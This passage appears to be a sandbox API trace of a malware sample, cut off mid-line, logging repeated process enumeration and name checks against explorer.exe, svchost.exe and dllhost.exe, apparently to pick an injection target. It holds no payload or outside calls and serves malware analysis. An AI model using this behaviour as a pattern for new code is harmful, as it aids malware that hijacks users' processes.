hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0176.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0176.829] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.829] CloseHandle (hObject=0xd8) returned 1 [0176.829] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0176.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0176.829] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.829] CloseHandle (hObject=0xd8) returned 1 [0176.829] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0176.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0176.830] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.830] CloseHandle (hObject=0xd8) returned 1 [0176.830] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0176.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0176.831] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.831] CloseHandle (hObject=0xd8) returned 1 [0176.831] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0176.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0176.831] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.831] CloseHandle (hObject=0xd8) returned 1 [0176.831] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0176.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0176.832] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.832] CloseHandle (hObject=0xd8) returned 1 [0176.832] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0176.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0176.832] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.832] CloseHandle (hObject=0xd8) returned 1 [0176.832] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0176.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0176.833] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.833] CloseHandle (hObject=0xd8) returned 1 [0176.833] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0176.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0176.834] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.834] CloseHandle (hObject=0xd8) returned 1 [0176.834] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0176.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0176.834] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.834] CloseHandle (hObject=0xd8) returned 1 [0176.834] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0176.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0176.835] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.835] CloseHandle (hObject=0xd8) returned 1 [0176.835] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0176.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0176.835] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.835] CloseHandle (hObject=0xd8) returned 1 [0176.835] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0176.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0176.836] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.836] CloseHandle (hObject=0xd8) returned 1 [0176.836] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0176.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0176.837] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.837] CloseHandle (hObject=0xd8) returned 1 [0176.837] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0176.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0176.837] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.837] CloseHandle (hObject=0xd8) returned 1 [0176.837] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0176.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0176.838] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.838] CloseHandle (hObject=0xd8) returned 1 [0176.838] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0176.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0176.838] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.838] CloseHandle (hObject=0xd8) returned 1 [0176.838] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0176.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0176.839] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.839] CloseHandle (hObject=0xd8) returned 1 [0176.839] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0176.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0176.839] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.840] CloseHandle (hObject=0xd8) returned 1 [0176.840] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0176.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0176.840] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.840] CloseHandle (hObject=0xd8) returned 1 [0176.840] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0176.841] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0176.841] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0176.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0176.842] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0176.842] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0176.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0176.843] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0176.843] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0176.844] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.844] CloseHandle (hObject=0xd8) returned 1 [0176.844] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0176.844] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0176.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0176.844] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.844] CloseHandle (hObject=0xd8) returned 1 [0176.844] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0176.844] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0176.845] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0176.845] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0176.845] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0176.846] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.846] CloseHandle (hObject=0xd8) returned 1 [0176.846] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0176.846] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.846] CloseHandle (hObject=0xd8) returned 1 [0176.846] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0176.846] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0176.847] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.847] CloseHandle (hObject=0xd8) returned 1 [0176.847] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.847] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0176.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x968) returned 0xd8 [0176.848] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.848] CloseHandle (hObject=0xd8) returned 1 [0176.848] lstrcmpiA (lpString1="regsvr32.exe", lpString2="explorer.exe") returned 1 [0176.848] lstrcmpiA (lpString1="regsvr32.exe", lpString2="svchost.exe") returned -1 [0176.848] lstrcmpiA (lpString1="regsvr32.exe", lpString2="dllhost.exe") returned 1 [0176.848] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0176.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0176.849] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.849] CloseHandle (hObject=0xd8) returned 1 [0176.849] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0176.849] CloseHandle (hObject=0xd4) returned 1 [0176.849] Sleep (dwMilliseconds=0x3e8) [0177.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0177.851] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0177.851] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0177.852] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0177.852] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0177.853] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0177.853] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0177.854] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0177.854] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0177.855] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0177.855] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0177.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0177.856] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0177.856] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0177.857] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0177.857] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0177.858] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0177.858] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0177.859] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, 